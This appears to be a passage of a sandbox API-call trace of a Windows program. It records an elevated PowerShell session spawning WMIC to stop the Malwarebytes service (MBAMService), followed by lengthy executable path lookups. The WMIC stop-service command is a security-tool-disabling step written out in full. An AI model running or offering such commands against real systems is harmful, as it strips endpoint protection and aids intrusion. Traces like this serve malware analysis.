out: lpFileInformation=0x1c8ed5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400)) returned 1 [0257.882] SetErrorMode (uMode=0x1) returned 0x1 [0257.882] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1040 [0257.882] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c8ed798, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8ed798) returned 0x4550 [0257.883] CoTaskMemFree (pv=0x1b9b1040) [0257.883] GetConsoleWindow () returned 0x5011e [0257.884] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0257.884] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0257.884] CoTaskMemFree (pv=0x2af8c0) [0257.884] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0257.884] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0257.884] CoTaskMemFree (pv=0x2af8c0) [0257.884] CommandLineToArgvW (in: lpCmdLine=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice", pNumArgs=0x1c8ed7e0 | out: pNumArgs=0x1c8ed7e0) returned 0x28a430*="" [0257.884] lstrlenW (lpString="path") returned 4 [0257.884] CoTaskMemAlloc (cb=0xc) returned 0x1b9f1060 [0257.884] RtlMoveMemory (in: Destination=0x1b9f1060, Source=0x28a472, Length=0xa | out: Destination=0x1b9f1060) [0257.884] CoTaskMemFree (pv=0x1b9f1060) [0257.884] lstrlenW (lpString="Win32_Service") returned 13 [0257.884] CoTaskMemAlloc (cb=0x1e) returned 0x1b9b1040 [0257.884] RtlMoveMemory (in: Destination=0x1b9b1040, Source=0x28a47c, Length=0x1c | out: Destination=0x1b9b1040) [0257.884] CoTaskMemFree (pv=0x1b9b1040) [0257.884] lstrlenW (lpString="where") returned 5 [0257.884] CoTaskMemAlloc (cb=0xe) returned 0x1b9f1060 [0257.884] RtlMoveMemory (in: Destination=0x1b9f1060, Source=0x28a498, Length=0xc | out: Destination=0x1b9f1060) [0257.884] CoTaskMemFree (pv=0x1b9f1060) [0257.884] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0257.885] CoTaskMemAlloc (cb=0x3a) returned 0x1b9c8560 [0257.885] RtlMoveMemory (in: Destination=0x1b9c8560, Source=0x28a4a4, Length=0x38 | out: Destination=0x1b9c8560) [0257.885] CoTaskMemFree (pv=0x1b9c8560) [0257.885] lstrlenW (lpString="call") returned 4 [0257.885] CoTaskMemAlloc (cb=0xc) returned 0x1b9f1060 [0257.885] RtlMoveMemory (in: Destination=0x1b9f1060, Source=0x28a4dc, Length=0xa | out: Destination=0x1b9f1060) [0257.885] CoTaskMemFree (pv=0x1b9f1060) [0257.885] lstrlenW (lpString="stopservice") returned 11 [0257.885] CoTaskMemAlloc (cb=0x1a) returned 0x1b9b1040 [0257.885] RtlMoveMemory (in: Destination=0x1b9b1040, Source=0x28a4e6, Length=0x18 | out: Destination=0x1b9b1040) [0257.885] CoTaskMemFree (pv=0x1b9b1040) [0257.885] LocalFree (hMem=0x28a430) returned 0x0 [0257.885] CoTaskMemAlloc (cb=0x804) returned 0x1b9f1790 [0257.885] GetConsoleTitleW (in: lpConsoleTitle=0x1b9f1790, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0257.885] CoTaskMemFree (pv=0x1b9f1790) [0257.886] CoTaskMemAlloc (cb=0x114) returned 0x253f20 [0257.886] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c8ed740*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30d7a98 | out: lpCommandLine="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice", lpProcessInformation=0x30d7a98*(hProcess=0x568, hThread=0x564, dwProcessId=0xbc0, dwThreadId=0xbbc)) returned 1 [0257.891] CoTaskMemFree (pv=0x253f20) [0257.891] CloseHandle (hObject=0x564) returned 1 [0257.891] CoTaskMemAlloc (cb=0x23) returned 0x1b9b1040 [0257.891] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x1c8ed7e8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c8ed7e8) returned 0x4550 [0257.891] CoTaskMemFree (pv=0x1b9b1040) [0257.891] GetCurrentProcess () returned 0xffffffffffffffff [0257.891] GetCurrentProcess () returned 0xffffffffffffffff [0257.891] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x568, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8ed8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8ed8c8*=0x564) returned 1 [0259.239] CloseHandle (hObject=0x564) returned 1 [0259.239] GetExitCodeProcess (in: hProcess=0x568, lpExitCode=0x1c8ed938 | out: lpExitCode=0x1c8ed938*=0x0) returned 1 [0259.239] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0259.240] CloseHandle (hObject=0x568) returned 1 [0259.240] SetEvent (hEvent=0x42c) returned 1 [0259.240] SetEvent (hEvent=0x424) returned 1 [0259.241] SetEvent (hEvent=0x420) returned 1 [0259.241] SetEvent (hEvent=0x428) returned 1 [0259.241] SetEvent (hEvent=0x43c) returned 1 [0259.241] SetEvent (hEvent=0x430) returned 1 [0259.241] SetEvent (hEvent=0x434) returned 1 [0259.241] SetEvent (hEvent=0x438) returned 1 [0259.241] SetEvent (hEvent=0x440) returned 1 [0259.241] CoUninitialize () Thread: id = 251 os_tid = 0x8c0 [0259.271] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0259.273] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0259.274] VirtualQuery (in: lpAddress=0x1c8cd4e0, lpBuffer=0x1c8ce3a0, dwLength=0x30 | out: lpBuffer=0x1c8ce3a0*(BaseAddress=0x1c8cd000, AllocationBase=0x1bf40000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.276] VirtualQuery (in: lpAddress=0x1c8cd790, lpBuffer=0x1c8ce650, dwLength=0x30 | out: lpBuffer=0x1c8ce650*(BaseAddress=0x1c8cd000, AllocationBase=0x1bf40000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0259.279] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0259.279] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0259.279] CoTaskMemFree (pv=0x2af8c0) [0259.279] CoTaskMemAlloc (cb=0x104) returned 0x2af8c0 [0259.279] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af8c0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0259.279] CoTaskMemFree (pv=0x2af8c0) [0259.280] CoTaskMemAlloc (cb=0x20e) returned 0x284e80 [0259.280] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x284e80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0259.280] CoTaskMemFree (pv=0x284e80) [0259.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.281] SetErrorMode (uMode=0x1) returned 0x1 [0259.281] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.281] SetErrorMode (uMode=0x1) returned 0x1 [0259.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.281] SetErrorMode (uMode=0x1) returned 0x1 [0259.282] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.282] SetErrorMode (uMode=0x1) returned 0x1 [0259.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.282] SetErrorMode (uMode=0x1) returned 0x1 [0259.283] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.283] SetErrorMode (uMode=0x1) returned 0x1 [0259.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.283] SetErrorMode (uMode=0x1) returned 0x1 [0259.283] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.284] SetErrorMode (uMode=0x1) returned 0x1 [0259.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.284] SetErrorMode (uMode=0x1) returned 0x1 [0259.284] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.284] SetErrorMode (uMode=0x1) returned 0x1 [0259.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.285] SetErrorMode (uMode=0x1) returned 0x1 [0259.285] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.285] SetErrorMode (uMode=0x1) returned 0x1 [0259.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.285] SetErrorMode (uMode=0x1) returned 0x1 [0259.285] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.286] SetErrorMode (uMode=0x1) returned 0x1 [0259.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.286] SetErrorMode (uMode=0x1) returned 0x1 [0259.286] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.287] SetErrorMode (uMode=0x1) returned 0x1 [0259.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.287] SetErrorMode (uMode=0x1) returned 0x1 [0259.287] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.287] SetErrorMode (uMode=0x1) returned 0x1 [0259.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.288] SetErrorMode (uMode=0x1) returned 0x1 [0259.288] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.288] SetErrorMode (uMode=0x1) returned 0x1 [0259.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.288] SetErrorMode (uMode=0x1) returned 0x1 [0259.288] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.289] SetErrorMode (uMode=0x1) returned 0x1 [0259.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.289] SetErrorMode (uMode=0x1) returned 0x1 [0259.289] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.289] SetErrorMode (uMode=0x1) returned 0x1 [0259.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.290] SetErrorMode (uMode=0x1) returned 0x1 [0259.290] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.290] SetErrorMode (uMode=0x1) returned 0x1 [0259.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.291] SetErrorMode (uMode=0x1) returned 0x1 [0259.291] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.291] SetErrorMode (uMode=0x1) returned 0x1 [0259.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0259.291] SetErrorMode (uMode=0x1) returned 0x1 [0259.291] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.292] SetErrorMode (uMode=0x1) returned 0x1 [0259.292] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.292] SetErrorMode (uMode=0x1) returned 0x1 [0259.292] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.292] SetErrorMode (uMode=0x1) returned 0x1 [0259.293] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.293] SetErrorMode (uMode=0x1) returned 0x1 [0259.293] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.293] SetErrorMode (uMode=0x1) returned 0x1 [0259.293] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.293] SetErrorMode (uMode=0x1) returned 0x1 [0259.294] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.294] SetErrorMode (uMode=0x1) returned 0x1 [0259.294] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.294] SetErrorMode (uMode=0x1) returned 0x1 [0259.294] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.295] SetErrorMode (uMode=0x1) returned 0x1 [0259.295] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.295] SetErrorMode (uMode=0x1) returned 0x1 [0259.295] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.295] SetErrorMode (uMode=0x1) returned 0x1 [0259.295] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.296] SetErrorMode (uMode=0x1) returned 0x1 [0259.296] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0259.296] SetErrorMode (uMode=0x1) returned 0x1 [0259.296] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0259.296] SetErrorMode (uMode=0x1) returned 0x1 [0259.297] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c8cd6c0 | out: lpFindFileData=0x1c8cd6c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, 